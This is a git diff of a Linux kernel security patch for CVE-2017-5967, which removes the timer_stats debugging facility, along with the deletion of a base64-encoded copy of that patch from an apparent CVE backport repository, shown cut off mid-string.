--The timer_stats functionality is inactive on bootup.
--
--To activate a sample period issue:
--# echo 1 >/proc/timer_stats
--
--To stop a sample period issue:
--# echo 0 >/proc/timer_stats
--
--The statistics can be retrieved by:
--# cat /proc/timer_stats
--
--The readout of /proc/timer_stats automatically disables sampling. The sampled
--information is kept until a new sample period is started. This allows multiple
--readouts.
--
--Sample output of /proc/timer_stats:
--
--Timerstats sample period: 3.888770 s
--  12,     0 swapper          hrtimer_stop_sched_tick (hrtimer_sched_tick)
--  15,     1 swapper          hcd_submit_urb (rh_timer_func)
--   4,   959 kedac            schedule_timeout (process_timeout)
--   1,     0 swapper          page_writeback_init (wb_timer_fn)
--  28,     0 swapper          hrtimer_stop_sched_tick (hrtimer_sched_tick)
--  22,  2948 IRQ 4            tty_flip_buffer_push (delayed_work_timer_fn)
--   3,  3100 bash             schedule_timeout (process_timeout)
--   1,     1 swapper          queue_delayed_work_on (delayed_work_timer_fn)
--   1,     1 swapper          queue_delayed_work_on (delayed_work_timer_fn)
--   1,     1 swapper          neigh_table_init_no_netlink (neigh_periodic_timer)
--   1,  2292 ip               __netdev_watchdog_up (dev_watchdog)
--   1,    23 events/1         do_cache_clean (delayed_work_timer_fn)
--90 total events, 30.0 events/sec
--
--The first column is the number of events, the second column the pid, the third
--column is the name of the process. The forth column shows the function which
--initialized the timer and in parenthesis the callback function which was
--executed on expiry.
--
--    Thomas, Ingo
--
--Added flag to indicate 'deferrable timer' in /proc/timer_stats. A deferrable
--timer will appear as follows
--  10D,     1 swapper          queue_delayed_work_on (delayed_work_timer_fn)
--
-diff --git a/include/linux/hrtimer.h b/include/linux/hrtimer.h
-index 0302bbe..765d9e7 100644
---- a/include/linux/hrtimer.h
-+++ b/include/linux/hrtimer.h
-@@ -96,12 +96,6 @@
-  * @function:	timer expiry callback function
-  * @base:	pointer to the timer base (per cpu and per clock)
-  * @state:	state information (See bit values above)
-- * @start_site:	timer statistics field to store the site where the timer
-- *		was started
-- * @start_comm: timer statistics field to store the name of the process which
-- *		started the timer
-- * @start_pid: timer statistics field to store the pid of the task which
-- *		started the timer
-  *
-  * The hrtimer structure must be initialized by hrtimer_init()
-  */
-@@ -111,11 +105,6 @@
- 	enum hrtimer_restart		(*function)(struct hrtimer *);
- 	struct hrtimer_clock_base	*base;
- 	unsigned long			state;
--#ifdef CONFIG_TIMER_STATS
--	int				start_pid;
--	void				*start_site;
--	char				start_comm[16];
--#endif
- };
- 
- /**
-diff --git a/include/linux/timer.h b/include/linux/timer.h
-index 8c5a197..7c8adfa 100644
---- a/include/linux/timer.h
-+++ b/include/linux/timer.h
-@@ -23,11 +23,6 @@
- 
- 	int slack;
- 
--#ifdef CONFIG_TIMER_STATS
--	int start_pid;
--	void *start_site;
--	char start_comm[16];
--#endif
- #ifdef CONFIG_LOCKDEP
- 	struct lockdep_map lockdep_map;
- #endif
-@@ -193,49 +188,6 @@
-  * jiffie.
-  */
- extern unsigned long get_next_timer_interrupt(unsigned long now);
--
--/*
-- * Timer-statistics info:
-- */
--#ifdef CONFIG_TIMER_STATS
--
--extern int timer_stats_active;
--
--#define TIMER_STATS_FLAG_DEFERRABLE	0x1
--
--extern void init_timer_stats(void);
--
--extern void timer_stats_update_stats(void *timer, pid_t pid, void *startf,
--				     void *timerf, char *comm,
--				     unsigned int timer_flag);
--
--extern void __timer_stats_timer_set_start_info(struct timer_list *timer,
--					       void *addr);
--
--static inline void timer_stats_timer_set_start_info(struct timer_list *timer)
--{
--	if (likely(!timer_stats_active))
--		return;
--	__timer_stats_timer_set_start_info(timer, __builtin_return_address(0));
--}
--
--static inline void timer_stats_timer_clear_start_info(struct timer_list *timer)
--{
--	timer->start_site = NULL;
--}
--#else
--static inline void init_timer_stats(void)
--{
--}
--
--static inline void timer_stats_timer_set_start_info(struct timer_list *timer)
--{
--}
--
--static inline void timer_stats_timer_clear_start_info(struct timer_list *timer)
--{
--}
--#endif
- 
- extern void add_timer(struct timer_list *timer);
- 
-diff --git a/kernel/hrtimer.c b/kernel/hrtimer.c
-index 47067de..c9c3a6c 100644
---- a/kernel/hrtimer.c
-+++ b/kernel/hrtimer.c
-@@ -827,34 +827,6 @@
- 	clock_was_set_delayed();
- }
- 
--static inline void timer_stats_hrtimer_set_start_info(struct hrtimer *timer)
--{
--#ifdef CONFIG_TIMER_STATS
--	if (timer->start_site)
--		return;
--	timer->start_site = __builtin_return_address(0);
--	memcpy(timer->start_comm, current->comm, TASK_COMM_LEN);
--	timer->start_pid = current->pid;
--#endif
--}
--
--static inline void timer_stats_hrtimer_clear_start_info(struct hrtimer *timer)
--{
--#ifdef CONFIG_TIMER_STATS
--	timer->start_site = NULL;
--#endif
--}
--
--static inline void timer_stats_account_hrtimer(struct hrtimer *timer)
--{
--#ifdef CONFIG_TIMER_STATS
--	if (likely(!timer_stats_active))
--		return;
--	timer_stats_update_stats(timer, timer->start_pid, timer->start_site,
--				 timer->function, timer->start_comm, 0);
--#endif
--}
--
- /*
-  * Counterpart to lock_hrtimer_base above:
-  */
-@@ -988,7 +960,6 @@
- 		 * rare case and less expensive than a smp call.
- 		 */
- 		debug_deactivate(timer);
--		timer_stats_hrtimer_clear_start_info(timer);
- 		reprogram = base->cpu_base == &__get_cpu_var(hrtimer_bases);
- 		/*
- 		 * We must preserve the CALLBACK state flag here,
-@@ -1033,8 +1004,6 @@
- 
- 	/* Switch the timer base, if necessary: */
- 	new_base = switch_hrtimer_base(timer, base, mode & HRTIMER_MODE_PINNED);
--
--	timer_stats_hrtimer_set_start_info(timer);
- 
- 	leftmost = enqueue_hrtimer(timer, new_base);
- 
-@@ -1211,12 +1180,6 @@
- 	base = hrtimer_clockid_to_base(clock_id);
- 	timer->base = &cpu_base->clock_base[base];
- 	timerqueue_init(&timer->node);
--
--#ifdef CONFIG_TIMER_STATS
--	timer->start_site = NULL;
--	timer->start_pid = -1;
--	memset(timer->start_comm, 0, TASK_COMM_LEN);
--#endif
- }
- 
- /**
-@@ -1264,7 +1227,6 @@
- 
- 	debug_deactivate(timer);
- 	__remove_hrtimer(timer, base, HRTIMER_STATE_CALLBACK, 0);
--	timer_stats_account_hrtimer(timer);
- 	fn = timer->function;
- 
- 	/*
-diff --git a/kernel/time/Makefile b/kernel/time/Makefile
-index aa91af5..fd87e51 100644
---- a/kernel/time/Makefile
-+++ b/kernel/time/Makefile
-@@ -7,4 +7,3 @@
- obj-$(CONFIG_GENERIC_SCHED_CLOCK)		+= sched_clock.o
- obj-$(CONFIG_TICK_ONESHOT)			+= tick-oneshot.o
- obj-$(CONFIG_TICK_ONESHOT)			+= tick-sched.o
--obj-$(CONFIG_TIMER_STATS)			+= timer_stats.o
-diff --git a/kernel/time/timer_list.c b/kernel/time/timer_list.c
-index 61ed862..f6a1043 100644
---- a/kernel/time/timer_list.c
-+++ b/kernel/time/timer_list.c
-@@ -57,21 +57,11 @@
- print_timer(struct seq_file *m, struct hrtimer *taddr, struct hrtimer *timer,
- 	    int idx, u64 now)
- {
--#ifdef CONFIG_TIMER_STATS
--	char tmp[TASK_COMM_LEN + 1];
--#endif
- 	SEQ_printf(m, " #%d: ", idx);
- 	print_name_offset(m, taddr);
- 	SEQ_printf(m, ", ");
- 	print_name_offset(m, timer->function);
- 	SEQ_printf(m, ", S:%02lx", timer->state);
--#ifdef CONFIG_TIMER_STATS
--	SEQ_printf(m, ", ");
--	print_name_offset(m, timer->start_site);
--	memcpy(tmp, timer->start_comm, TASK_COMM_LEN);
--	tmp[TASK_COMM_LEN] = 0;
--	SEQ_printf(m, ", %s/%d", tmp, timer->start_pid);
--#endif
- 	SEQ_printf(m, "\n");
- 	SEQ_printf(m, " # expires at %Lu-%Lu nsecs [in %Ld to %Ld nsecs]\n",
- 		(unsigned long long)ktime_to_ns(hrtimer_get_softexpires(timer)),
-diff --git a/kernel/time/timer_stats.c b/kernel/time/timer_stats.c
-deleted file mode 100644
-index 0b537f2..0000000
---- a/kernel/time/timer_stats.c
-+++ /dev/null
-@@ -1,425 +0,0 @@
--/*
-- * kernel/time/timer_stats.c
-- *
-- * Collect timer usage statistics.
-- *
-- * Copyright(C) 2006, Red Hat, Inc., Ingo Molnar
-- * Copyright(C) 2006 Timesys Corp., Thomas Gleixner <tglx@timesys.com>
-- *
-- * timer_stats is based on timer_top, a similar functionality which was part of
-- * Con Kolivas dyntick patch set. It was developed by Daniel Petrini at the
-- * Instituto Nokia de Tecnologia - INdT - Manaus. timer_top's design was based
-- * on dynamic allocation of the statistics entries and linear search based
-- * lookup combined with a global lock, rather than the static array, hash
-- * and per-CPU locking which is used by timer_stats. It was written for the
-- * pre hrtimer kernel code and therefore did not take hrtimers into account.
-- * Nevertheless it provided the base for the timer_stats implementation and
-- * was a helpful source of inspiration. Kudos to Daniel and the Nokia folks
-- * for this effort.
-- *
-- * timer_top.c is
-- *	Copyright (C) 2005 Instituto Nokia de Tecnologia - INdT - Manaus
-- *	Written by Daniel Petrini <d.pensator@gmail.com>
-- *	timer_top.c was released under the GNU General Public License version 2
-- *
-- * We export the addresses and counting of timer functions being called,
-- * the pid and cmdline from the owner process if applicable.
-- *
-- * Start/stop data collection:
-- * # echo [1|0] >/proc/timer_stats
-- *
-- * Display the information collected so far:
-- * # cat /proc/timer_stats
-- *
-- * This program is free software; you can redistribute it and/or modify
-- * it under the terms of the GNU General Public License version 2 as
-- * published by the Free Software Foundation.
-- */
--
--#include <linux/proc_fs.h>
--#include <linux/module.h>
--#include <linux/spinlock.h>
--#include <linux/sched.h>
--#include <linux/seq_file.h>
--#include <linux/kallsyms.h>
--
--#include <asm/uaccess.h>
--
--/*
-- * This is our basic unit of interest: a timer expiry event identified
-- * by the timer, its start/expire functions and the PID of the task that
-- * started the timer. We count the number of times an event happens:
-- */
--struct entry {
--	/*
--	 * Hash list:
--	 */
--	struct entry		*next;
--
--	/*
--	 * Hash keys:
--	 */
--	void			*timer;
--	void			*start_func;
--	void			*expire_func;
--	pid_t			pid;
--
--	/*
--	 * Number of timeout events:
--	 */
--	unsigned long		count;
--	unsigned int		timer_flag;
--
--	/*
--	 * We save the command-line string to preserve
--	 * this information past task exit:
--	 */
--	char			comm[TASK_COMM_LEN + 1];
--
--} ____cacheline_aligned_in_smp;
--
--/*
-- * Spinlock protecting the tables - not taken during lookup:
-- */
--static DEFINE_RAW_SPINLOCK(table_lock);
--
--/*
-- * Per-CPU lookup locks for fast hash lookup:
-- */
--static DEFINE_PER_CPU(raw_spinlock_t, tstats_lookup_lock);
--
--/*
-- * Mutex to serialize state changes with show-stats activities:
-- */
--static DEFINE_MUTEX(show_mutex);
--
--/*
-- * Collection status, active/inactive:
-- */
--int __read_mostly timer_stats_active;
--
--/*
-- * Beginning/end timestamps of measurement:
-- */
--static ktime_t time_start, time_stop;
--
--/*
-- * tstat entry structs only get allocated while collection is
-- * active and never freed during that time - this simplifies
-- * things quite a bit.
-- *
-- * They get freed when a new collection period is started.
-- */
--#define MAX_ENTRIES_BITS	10
--#define MAX_ENTRIES		(1UL << MAX_ENTRIES_BITS)
--
--static unsigned long nr_entries;
--static struct entry entries[MAX_ENTRIES];
--
--static atomic_t overflow_count;
--
--/*
-- * The entries are in a hash-table, for fast lookup:
-- */
--#define TSTAT_HASH_BITS		(MAX_ENTRIES_BITS - 1)
--#define TSTAT_HASH_SIZE		(1UL << TSTAT_HASH_BITS)
--#define TSTAT_HASH_MASK		(TSTAT_HASH_SIZE - 1)
--
--#define __tstat_hashfn(entry)						\
--	(((unsigned long)(entry)->timer       ^				\
--	  (unsigned long)(entry)->start_func  ^				\
--	  (unsigned long)(entry)->expire_func ^				\
--	  (unsigned long)(entry)->pid		) & TSTAT_HASH_MASK)
--
--#define tstat_hashentry(entry)	(tstat_hash_table + __tstat_hashfn(entry))
--
--static struct entry *tstat_hash_table[TSTAT_HASH_SIZE] __read_mostly;
--
--static void reset_entries(void)
--{
--	nr_entries = 0;
--	memset(entries, 0, sizeof(entries));
--	memset(tstat_hash_table, 0, sizeof(tstat_hash_table));
--	atomic_set(&overflow_count, 0);
--}
--
--static struct entry *alloc_entry(void)
--{
--	if (nr_entries >= MAX_ENTRIES)
--		return NULL;
--
--	return entries + nr_entries++;
--}
--
--static int match_entries(struct entry *entry1, struct entry *entry2)
--{
--	return entry1->timer       == entry2->timer	  &&
--	       entry1->start_func  == entry2->start_func  &&
--	       entry1->expire_func == entry2->expire_func &&
--	       entry1->pid	   == entry2->pid;
--}
--
--/*
-- * Look up whether an entry matching this item is present
-- * in the hash already. Must be called with irqs off and the
-- * lookup lock held:
-- */
--static struct entry *tstat_lookup(struct entry *entry, char *comm)
--{
--	struct entry **head, *curr, *prev;
--
--	head = tstat_hashentry(entry);
--	curr = *head;
--
--	/*
--	 * The fastpath is when the entry is already hashed,
--	 * we do this with the lookup lock held, but with the
--	 * table lock not held:
--	 */
--	while (curr) {
--		if (match_entries(curr, entry))
--			return curr;
--
--		curr = curr->next;
--	}
--	/*
--	 * Slowpath: allocate, set up and link a new hash entry:
--	 */
--	prev = NULL;
--	curr = *head;
--
--	raw_spin_lock(&table_lock);
--	/*
--	 * Make sure we have not raced with another CPU:
--	 */
--	while (curr) {
--		if (match_entries(curr, entry))
--			goto out_unlock;
--
--		prev = curr;
--		curr = curr->next;
--	}
--
--	curr = alloc_entry();
--	if (curr) {
--		*curr = *entry;
--		curr->count = 0;
--		curr->next = NULL;
--		memcpy(curr->comm, comm, TASK_COMM_LEN);
--
--		smp_mb(); /* Ensure that curr is initialized before insert */
--
--		if (prev)
--			prev->next = curr;
--		else
--			*head = curr;
--	}
-- out_unlock:
--	raw_spin_unlock(&table_lock);
--
--	return curr;
--}
--
--/**
-- * timer_stats_update_stats - Update the statistics for a timer.
-- * @timer:	pointer to either a timer_list or a hrtimer
-- * @pid:	the pid of the task which set up the timer
-- * @startf:	pointer to the function which did the timer setup
-- * @timerf:	pointer to the timer callback function of the timer
-- * @comm:	name of the process which set up the timer
-- *
-- * When the timer is already registered, then the event counter is
-- * incremented. Otherwise the timer is registered in a free slot.
-- */
--void timer_stats_update_stats(void *timer, pid_t pid, void *startf,
--			      void *timerf, char *comm,
--			      unsigned int timer_flag)
--{
--	/*
--	 * It doesn't matter which lock we take:
--	 */
--	raw_spinlock_t *lock;
--	struct entry *entry, input;
--	unsigned long flags;
--
--	if (likely(!timer_stats_active))
--		return;
--
--	lock = &per_cpu(tstats_lookup_lock, raw_smp_processor_id());
--
--	input.timer = timer;
--	input.start_func = startf;
--	input.expire_func = timerf;
--	input.pid = pid;
--	input.timer_flag = timer_flag;
--
--	raw_spin_lock_irqsave(lock, flags);
--	if (!timer_stats_active)
--		goto out_unlock;
--
--	entry = tstat_lookup(&input, comm);
--	if (likely(entry))
--		entry->count++;
--	else
--		atomic_inc(&overflow_count);
--
-- out_unlock:
--	raw_spin_unlock_irqrestore(lock, flags);
--}
--
--static void print_name_offset(struct seq_file *m, unsigned long addr)
--{
--	char symname[KSYM_NAME_LEN];
--
--	if (lookup_symbol_name(addr, symname) < 0)
--		seq_printf(m, "<%p>", (void *)addr);
--	else
--		seq_printf(m, "%s", symname);
--}
--
--static int tstats_show(struct seq_file *m, void *v)
--{
--	struct timespec period;
--	struct entry *entry;
--	unsigned long ms;
--	long events = 0;
--	ktime_t time;
--	int i;
--
--	mutex_lock(&show_mutex);
--	/*
--	 * If still active then calculate up to now:
--	 */
--	if (timer_stats_active)
--		time_stop = ktime_get();
--
--	time = ktime_sub(time_stop, time_start);
--
--	period = ktime_to_timespec(time);
--	ms = period.tv_nsec / 1000000;
--
--	seq_puts(m, "Timer Stats Version: v0.2\n");
--	seq_printf(m, "Sample period: %ld.%03ld s\n", period.tv_sec, ms);
--	if (atomic_read(&overflow_count))
--		seq_printf(m, "Overflow: %d entries\n",
--			atomic_read(&overflow_count));
--
--	for (i = 0; i < nr_entries; i++) {
--		entry = entries + i;
-- 		if (entry->timer_flag & TIMER_STATS_FLAG_DEFERRABLE) {
--			seq_printf(m, "%4luD, %5d %-16s ",
--				entry->count, entry->pid, entry->comm);
--		} else {
--			seq_printf(m, " %4lu, %5d %-16s ",
--				entry->count, entry->pid, entry->comm);
--		}
--
--		print_name_offset(m, (unsigned long)entry->start_func);
--		seq_puts(m, " (");
--		print_name_offset(m, (unsigned long)entry->expire_func);
--		seq_puts(m, ")\n");
--
--		events += entry->count;
--	}
--
--	ms += period.tv_sec * 1000;
--	if (!ms)
--		ms = 1;
--
--	if (events && period.tv_sec)
--		seq_printf(m, "%ld total events, %ld.%03ld events/sec\n",
--			   events, events * 1000 / ms,
--			   (events * 1000000 / ms) % 1000);
--	else
--		seq_printf(m, "%ld total events\n", events);
--
--	mutex_unlock(&show_mutex);
--
--	return 0;
--}
--
--/*
-- * After a state change, make sure all concurrent lookup/update
-- * activities have stopped:
-- */
--static void sync_access(void)
--{
--	unsigned long flags;
--	int cpu;
--
--	for_each_online_cpu(cpu) {
--		raw_spinlock_t *lock = &per_cpu(tstats_lookup_lock, cpu);
--
--		raw_spin_lock_irqsave(lock, flags);
--		/* nothing */
--		raw_spin_unlock_irqrestore(lock, flags);
--	}
--}
--
--static ssize_t tstats_write(struct file *file, const char __user *buf,
--			    size_t count, loff_t *offs)
--{
--	char ctl[2];
--
--	if (count != 2 || *offs)
--		return -EINVAL;
--
--	if (copy_from_user(ctl, buf, count))
--		return -EFAULT;
--
--	mutex_lock(&show_mutex);
--	switch (ctl[0]) {
--	case '0':
--		if (timer_stats_active) {
--			timer_stats_active = 0;
--			time_stop = ktime_get();
--			sync_access();
--		}
--		break;
--	case '1':
--		if (!timer_stats_active) {
--			reset_entries();
--			time_start = ktime_get();
--			smp_mb();
--			timer_stats_active = 1;
--		}
--		break;
--	default:
--		count = -EINVAL;
--	}
--	mutex_unlock(&show_mutex);
--
--	return count;
--}
--
--static int tstats_open(struct inode *inode, struct file *filp)
--{
--	return single_open(filp, tstats_show, NULL);
--}
--
--static const struct file_operations tstats_fops = {
--	.open		= tstats_open,
--	.read		= seq_read,
--	.write		= tstats_write,
--	.llseek		= seq_lseek,
--	.release	= single_release,
--};
--
--void __init init_timer_stats(void)
--{
--	int cpu;
--
--	for_each_possible_cpu(cpu)
--		raw_spin_lock_init(&per_cpu(tstats_lookup_lock, cpu));
--}
--
--static int __init init_tstats_procfs(void)
--{
--	struct proc_dir_entry *pe;
--
--	pe = proc_create("timer_stats", 0644, NULL, &tstats_fops);
--	if (!pe)
--		return -ENOMEM;
--	return 0;
--}
--__initcall(init_tstats_procfs);
-diff --git a/kernel/timer.c b/kernel/timer.c
-index 5733076..8bff0a9 100644
---- a/kernel/timer.c
-+++ b/kernel/timer.c
-@@ -397,34 +397,6 @@
- 	}
- }
- 
--#ifdef CONFIG_TIMER_STATS
--void __timer_stats_timer_set_start_info(struct timer_list *timer, void *addr)
--{
--	if (timer->start_site)
--		return;
--
--	timer->start_site = addr;
--	memcpy(timer->start_comm, current->comm, TASK_COMM_LEN);
--	timer->start_pid = current->pid;
--}
--
--static void timer_stats_account_timer(struct timer_list *timer)
--{
--	unsigned int flag = 0;
--
--	if (likely(!timer->start_site))
--		return;
--	if (unlikely(tbase_get_deferrable(timer->base)))
--		flag |= TIMER_STATS_FLAG_DEFERRABLE;
--
--	timer_stats_update_stats(timer, timer->start_pid, timer->start_site,
--				 timer->function, timer->start_comm, flag);
--}
--
--#else
--static void timer_stats_account_timer(struct timer_list *timer) {}
--#endif
--
- #ifdef CONFIG_DEBUG_OBJECTS_TIMERS
- 
- static struct debug_obj_descr timer_debug_descr;
-@@ -637,11 +609,6 @@
- 	timer->entry.next = NULL;
- 	timer->base = (void *)((unsigned long)base | flags);
- 	timer->slack = -1;
--#ifdef CONFIG_TIMER_STATS
--	timer->start_site = NULL;
--	timer->start_pid = -1;
--	memset(timer->start_comm, 0, TASK_COMM_LEN);
--#endif
- 	lockdep_init_map(&timer->lockdep_map, name, key, 0);
- }
- 
-@@ -739,7 +706,6 @@
- 	unsigned long flags;
- 	int ret = 0 , cpu;
- 
--	timer_stats_timer_set_start_info(timer);
- 	BUG_ON(!timer->function);
- 
- 	base = lock_timer_base(timer, &flags);
-@@ -943,7 +909,6 @@
- 	struct tvec_base *base = per_cpu(tvec_bases, cpu);
- 	unsigned long flags;
- 
--	timer_stats_timer_set_start_info(timer);
- 	BUG_ON(timer_pending(timer) || !timer->function);
- 	spin_lock_irqsave(&base->lock, flags);
- 	timer_set_base(timer, base);
-@@ -981,7 +946,6 @@
- 
- 	debug_assert_init(timer);
- 
--	timer_stats_timer_clear_start_info(timer);
- 	if (timer_pending(timer)) {
- 		base = lock_timer_base(timer, &flags);
- 		ret = detach_if_pending(timer, base, true);
-@@ -1009,10 +973,9 @@
- 
- 	base = lock_timer_base(timer, &flags);
- 
--	if (base->running_timer != timer) {
--		timer_stats_timer_clear_start_info(timer);
-+	if (base->running_timer != timer)
- 		ret = detach_if_pending(timer, base, true);
--	}
-+
- 	spin_unlock_irqrestore(&base->lock, flags);
- 
- 	return ret;
-@@ -1192,8 +1155,6 @@
- 			fn = timer->function;
- 			data = timer->data;
- 			irqsafe = tbase_get_irqsafe(timer->base);
--
--			timer_stats_account_timer(timer);
- 
- 			base->running_timer = timer;
- 			detach_expired_timer(timer, base);
-@@ -1695,7 +1656,6 @@
- 
- 	err = timer_cpu_notify(&timers_nb, (unsigned long)CPU_UP_PREPARE,
- 			       (void *)(long)smp_processor_id());
--	init_timer_stats();
- 
- 	BUG_ON(err != NOTIFY_OK);
- 
-diff --git a/kernel/workqueue.c b/kernel/workqueue.c
-index 2505648..562f1a5 100755
---- a/kernel/workqueue.c
-+++ b/kernel/workqueue.c
-@@ -1448,8 +1448,6 @@
- 		return;
- 	}
- 
--	timer_stats_timer_set_start_info(&dwork->timer);
--
- 	dwork->wq = wq;
- 	dwork->cpu = cpu;
- 	timer->expires = jiffies + delay;
-diff --git a/lib/Kconfig.debug b/lib/Kconfig.debug
-index a0818f1..822e2be 100755
---- a/lib/Kconfig.debug
-+++ b/lib/Kconfig.debug
-@@ -400,20 +400,6 @@
- 	  application, you can say N to avoid the very slight overhead
- 	  this adds.
- 
--config TIMER_STATS
--	bool "Collect kernel timers statistics"
--	depends on DEBUG_KERNEL && PROC_FS
--	help
--	  If you say Y here, additional code will be inserted into the
--	  timer routines to collect statistics about kernel timers being
--	  reprogrammed. The statistics can be read from /proc/timer_stats.
--	  The statistics collection is started by writing 1 to /proc/timer_stats,
--	  writing 0 stops it. This feature is useful to collect information
--	  about timer usage patterns in kernel and userspace. This feature
--	  is lightweight if enabled in the kernel config but not activated
--	  (it defaults to deactivated on bootup and will only be activated
--	  if some application like powertop activates it explicitly).
--
- config DEBUG_OBJECTS
- 	bool "Debug object operations"
- 	depends on DEBUG_KERNEL
diff --git a/Patches/Linux_CVEs/CVE-2017-5967/3.10/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-5967/3.10/0001.patch.base64
deleted file mode 100644
index 1883365e..00000000
--- a/Patches/Linux_CVEs/CVE-2017-5967/3.10/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-RnJvbSAwNDA3YzdhMmY0NzM0Y2Q1NTkwMjc1M2Q3ODhmZGJkYzMyZWQ3ZmQ5IE1vbiBTZXAgMTcgMDA6MDA6MDAgMjAwMQpGcm9tOiBLZWVzIENvb2sgPGtlZXNjb29rQGNocm9taXVtLm9yZz4KRGF0ZTogV2VkLCAwOCBGZWIgMjAxNyAxMToyNjo1OSAtMDgwMApTdWJqZWN0OiBbUEFUQ0hdIHRpbWU6IFJlbW92ZSBDT05GSUdfVElNRVJfU1RBVFMKCkN1cnJlbnRseSBDT05GSUdfVElNRVJfU1RBVFMgZXhwb3NlcyBwcm9jZXNzIGluZm9ybWF0aW9uIGFjcm9zcyBuYW1lc3BhY2VzOgoKa2VybmVsL3RpbWUvdGltZXJfbGlzdC5jIHByaW50X3RpbWVyKCk6CgogICAgICAgIFNFUV9wcmludGYobSwgIiwgJXMvJWQiLCB0bXAsIHRpbWVyLT5zdGFydF9waWQpOwoKL3Byb2MvdGltZXJfbGlzdDoKCiAjMTE6IDwwMDAwMDAwMDAwMDAwMDAwPiwgaHJ0aW1lcl93YWtldXAsIFM6MDEsIGRvX25hbm9zbGVlcCwgY3Jvbi8yNTcwCgpHaXZlbiB0aGF0IHRoZSB0cmFjZXIgY2FuIGdpdmUgdGhlIHNhbWUgaW5mb3JtYXRpb24sIHRoaXMgcGF0Y2ggZW50aXJlbHkKcmVtb3ZlcyBDT05GSUdfVElNRVJfU1RBVFMuCgpDaGFuZ2UtSWQ6IEljZTI2ZDc0MDk0ZDNhZDU2MzgwODM0MmMxNjA0YWQ0NDQyMzQ4NDRiClN1Z2dlc3RlZC1ieTogVGhvbWFzIEdsZWl4bmVyIDx0Z2x4QGxpbnV0cm9uaXguZGU+ClNpZ25lZC1vZmYtYnk6IEtlZXMgQ29vayA8a2Vlc2Nvb2tAY2hyb21pdW0ub3JnPgpBY2tlZC1ieTogSm9obiBTdHVsdHogPGpvaG4uc3R1bHR6QGxpbmFyby5vcmc+CkNjOiBOaWNvbGFzIFBpdHJlIDxuaWNvbGFzLnBpdHJlQGxpbmFyby5vcmc+CkNjOiBsaW51eC1kb2NAdmdlci5rZXJuZWwub3JnCkNjOiBMYWkgSmlhbmdzaGFuIDxqaWFuZ3NoYW5sYWlAZ21haWwuY29tPgpDYzogU2h1YWggS2hhbiA8c2h1YWhAa2VybmVsLm9yZz4KQ2M6IFhpbmcgR2FvIDx4Z2FvMDFAZW1haWwud20uZWR1PgpDYzogSm9uYXRoYW4gQ29yYmV0IDxjb3JiZXRAbHduLm5ldD4KQ2M6IEplc3NpY2EgRnJhemVsbGUgPG1lQGplc3NmcmF6LmNvbT4KQ2M6IGtlcm5lbC1oYXJkZW5pbmdAbGlzdHMub3BlbndhbGwuY29tCkNjOiBOaWNvbGFzIElvb3NzIDxuaWNvbGFzLmlvb3NzX2xpbnV4QG00eC5vcmc+CkNjOiAiUGF1bCBFLiBNY0tlbm5leSIgPHBhdWxtY2tAbGludXgudm5ldC5pYm0uY29tPgpDYzogUGV0ciBNbGFkZWsgPHBtbGFkZWtAc3VzZS5jb20+CkNjOiBSaWNoYXJkIENvY2hyYW4gPHJpY2hhcmRjb2NocmFuQGdtYWlsLmNvbT4KQ2M6IFRlanVuIEhlbyA8dGpAa2VybmVsLm9yZz4KQ2M6IE1pY2hhbCBNYXJlayA8bW1hcmVrQHN1c2UuY29tPgpDYzogSm9zaCBQb2ltYm9ldWYgPGpwb2ltYm9lQHJlZGhhdC5jb20+CkNjOiBEbWl0cnkgVnl1a292IDxkdnl1a292QGdvb2dsZS5jb20+CkNjOiBPbGVnIE5lc3Rlcm92IDxvbGVnQHJlZGhhdC5jb20+CkNjOiAiRXJpYyBXLiBCaWVkZXJtYW4iIDxlYmllZGVybUB4bWlzc2lvbi5jb20+CkNjOiBPbG9mIEpvaGFuc3NvbiA8b2xvZkBsaXhvbS5uZXQ+CkNjOiBBbmRyZXcgTW9ydG9uIDxha3BtQGxpbnV4LWZvdW5kYXRpb24ub3JnPgpDYzogbGludXgtYXBpQHZnZXIua2VybmVsLm9yZwpDYzogQXJqYW4gdmFuIGRlIFZlbiA8YXJqYW5AbGludXguaW50ZWwuY29tPgpMaW5rOiBodHRwOi8vbGttbC5rZXJuZWwub3JnL3IvMjAxNzAyMDgxOTI2NTkuR0EzMjU4MkBiZWFzdApTaWduZWQtb2ZmLWJ5OiBUaG9tYXMgR2xlaXhuZXIgPHRnbHhAbGludXRyb25peC5kZT4KLS0tCgpkaWZmIC0tZ2l0IGEvRG9jdW1lbnRhdGlvbi90aW1lcnMvdGltZXJfc3RhdHMudHh0IGIvRG9jdW1lbnRhdGlvbi90aW1lcnMvdGltZXJfc3RhdHMudHh0CmRlbGV0ZWQgZmlsZSBtb2RlIDEwMDY0NAppbmRleCA4YWJkNDBiLi4wMDAwMDAwCi0tLSBhL0RvY3VtZW50YXRpb24vdGltZXJzL3RpbWVyX3N0YXRzLnR4dAorKysgL2Rldi9udWxsCkBAIC0xLDczICswLDAgQEAKLXRpbWVyX3N0YXRzIC0gdGltZXIgdXNhZ2Ugc3RhdGlzdGljcwotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCi0KLXRpbWVyX3N0YXRzIGlzIGEgZGVidWdnaW5nIGZhY2lsaXR5IHRvIG1ha2UgdGhlIHRpbWVyIChhYil1c2FnZSBpbiBhIExpbnV4Ci1zeXN0ZW0gdmlzaWJsZSB0byBrZXJuZWwgYW5kIHVzZXJzcGFjZSBkZXZlbG9wZXJzLiBJZiBlbmFibGVkIGluIHRoZSBjb25maWcKLWJ1dCBub3QgdXNlZCBpdCBoYXMgYWxtb3N0IHplcm8gcnVudGltZSBvdmVyaGVhZCwgYW5kIGEgcmVsYXRpdmVseSBzbWFsbAotZGF0YSBzdHJ1Y3R1cmUgb3ZlcmhlYWQuIEV2ZW4gaWYgY29sbGVjdGlvbiBpcyBlbmFibGVkIHJ1bnRpbWUgYWxsIHRoZQotbG9ja2luZyBpcyBwZXItQ1BVIGFuZCBsb29rdXAgaXMgaGFzaGVkLgotCi10aW1lcl9zdGF0cyBzaG91bGQgYmUgdXNlZCBieSBrZXJuZWwgYW5kIHVzZXJzcGFjZSBkZXZlbG9wZXJzIHRvIHZlcmlmeSB0aGF0Ci10aGVpciBjb2RlIGRvZXMgbm90IG1ha2UgdW5kdWx5IHVzZSBvZiB0aW1lcnMuIFRoaXMgaGVscHMgdG8gYXZvaWQgdW5uZWNlc3NhcnkKLXdha2V1cHMsIHdoaWNoIHNob3VsZCBiZSBhdm9pZGVkIHRvIG9wdGltaXplIHBvd2VyIGNvbnN1bXB0aW9uLgotCi1JdCBjY